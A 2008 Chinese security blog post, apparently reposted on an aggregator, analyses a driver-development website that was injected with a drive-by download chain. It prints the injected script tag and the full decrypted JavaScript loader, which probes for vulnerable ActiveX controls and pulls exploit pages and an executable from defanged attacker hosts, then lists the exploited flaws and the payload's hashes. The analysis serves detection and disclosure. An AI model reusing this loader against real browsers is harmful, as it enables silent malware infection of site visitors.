某驱动开发网被挂马Trojan.DL.Win32.Small.gkm
来源:互联网 发布:网络打电话软件哪个好 编辑:程序博客网 时间:2024/05/17 23:41
某驱动开发网被挂马Trojan.DL.Win32.Small.gkm
endurer 原创
2008-01-23 第1版
打开该网站,Kaspersky报告:
2008-1-21 14:30:41 恶意 HTTP 对象 <hxxp://list**.ad*s**looks.info/list.js>: 已检测 木马程序 Trojan-Downloader.JS.Small.js.
检查网站首页代码,发现:
/---
<SCRIPT LANGUAGE="javascript1.2" SRC="hxxp://list**.ad*s**looks.info/list.js"></SCRIPT>
---/
可能是该网站服务器所在机房有ARP病毒在做怪。
hxxp://list**.ad*s**looks.info/list.js的代码解密为后为:
/---
if(document.cookie.indexOf('OKSUN')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='OKSUN=SUN;path=/;expires='+expires.toGMTString();document.write("<script src=hxxp://k***.2*2**2*360.com/6.gif><//script>");if(e!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/1.gif><//script>")}else{try{var f;var storm=new ActiveXObject("MPS.StormPlayer")}catch(f){};finally{if(f!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/2.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")}catch(g){};finally{if(g!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/3.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var h;var thunder=new ActiveXObject("DPClient.Vod")}catch(h){};finally{if(h!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/4.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var i;var yahoo=new ActiveXObject("GLCHAT.GLChatCtrl.1")}catch(i){};finally{if(i!="[object Error]"){document.write("<iframe style=display:none src=hxxp://k***.2*2**2*360.com/5.gif></iframe>")}}try{var j;var obj=new ActiveXObject("BaiduBar.Tool")}catch(j){};finally{if(j!="[object Error]"){obj.DloadDS("hxxp://k***.2*2**2*360.com/ads/ads.cab","ads.exe",0);document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}}}<script src=hxxp://k***.2*2**2*360.com/6.gif></script><script src=hxxp://k***.2*2**2*360.com/3.gif></script><DIV style="CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')"></DIV>
---/
1. hxxp://k***.2*2**2*360.com/6.gif 包含利用RealPlayer漏洞利用代码
2. hxxp://k***.2*2**2*360.com/1.gif
Kaspersky 报为 Trojan-Downloader.JS.Small.en,包含 利用 MS06014 漏洞下载 hxxp://k***.2*2**2*360.com/ads/ads.jpg.exe 的 JavaScript 脚本代码
文件说明符 : D:/test/ads.jpg.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-23 13:15:50
修改时间 : 2007-11-23 13:15:50
访问时间 : 2008-1-22 0:0:0
大小 : 6656 字节 6.512 KB
MD5 : f81ce2b0f46ca9ced6558fdadfb45099
SHA1: 90E14F9049B51DF1BF70A8363162C782B321714E
CRC32: d55ccaa9
Kaspersky 报为 Trojan-Downloader.Win32.Small.gkm,感星报为 Trojan.DL.Win32.Small.gkm
3. hxxp://k***.2*2**2*360.com/2.gif
包含 利用暴风影音漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe 的JavaScript 脚本代码
ads.exe 与 ads.jpg.exe 相同
4. hxxp://k***.2*2**2*360.com/ads.c
利用 ANI漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe
5 hxxp://k***.2*2**2*360.com/3.gif
包含利用PPStream漏洞下载 hxxp://ads**.ad*s**looks.info/ads/ads.exe 的 JavaScript 脚本代码
5. hxxp://k***.2*2**2*360.com/4.gif
包含利用迅雷漏洞下载 hxxp://ads**.ad*s**looks.info/ads/ads.exe 的 JavaScript 脚本代码
6. hxxp://k***.2*2**2*360.com/5.gif
Kaspersky报为 Trojan-Downloader.JS.Small.jh
利用联众世界GLChat.ocx 控件漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe
7.hxxp://k***.2*2**2*360.com/ads/ads.cab 包含 ads.exe
- 某驱动开发网被挂马Trojan.DL.Win32.Small.gkm
- 某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small
- 某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
- 木马Trojan-Proxy.Win32.Small.du 分析
- 解决病毒Trojan.DL.Small.azt、Trojan.DL.QQHelper.dsb、Dropper.Agent.bba等
- 遭遇Trojan.DL.Win32.Autorun.yuz,Trojan.Win32.Inject.gh,Trojan.Win32.Agent.zsq等
- Trojan.PSW.Win32.GameOL,Trojan.Win32.Undef,Trojan.DL.Win32.Undef等1
- Trojan.PSW.Win32.GameOL,Trojan.Win32.Undef,Trojan.DL.Win32.Undef等2
- 某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码
- 某P2P视频软件论坛被挂马Trojan.DL.Win32.Mnless.rq
- 木马下载器Trojan-Downloader.Win32.Small.nkb
- ARP病毒加入的网址传播 Trojan.PSW.Win32.OnlineGames,Trojan.DL.Win32.Agent.xaa
- 某县农业网被挂马 Trojan.Win32.KillAV.bca/Trojan-Downloader.Win32.Geral.ix
- 删掉Trojan.DL.Win32.Hmir病毒的方法
- 木马MicrosoftSQL.exe(Trojan-Downloader.Win32.VB.ajb/Trojan.DL.VB.cap)
- 某知识问答竞技生活网被挂马Trojan.Win32.Undef.eab
- X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel
- 某职业指导网被挂Trojan.Win32.KillAV,Trojan.PSW.Win32.QQPass,RootKit.Win32.Mnless等
- 读写COM口
- Java语言介绍(04)开源项目(02)持久层框架(01)Hibernate
- 用delphi编写打印程序的窍门
- 关于Visual Studio 2005的调试
- Leo说说写简历之晋级篇 - 职业生涯顾问Leo - CSDNBlog
- 某驱动开发网被挂马Trojan.DL.Win32.Small.gkm
- Java语言介绍(04)开源项目(02)持久层框架(02)IBATIS
- ejb笔记一 one to one
- C专栏E-声明typedef
- Java语言介绍(04)开源项目(03)作业调度(01)Quartz
- Leo说说写简历之秘籍篇 - 职业生涯顾问Leo - CSDNBlog
- 通过键盘控制SHAPE的形态
- Java语言介绍(04)开源项目(04)模板引擎(01)Velocity
- Java语言介绍(04)开源项目(05)博客系统(01)Roller Weblogger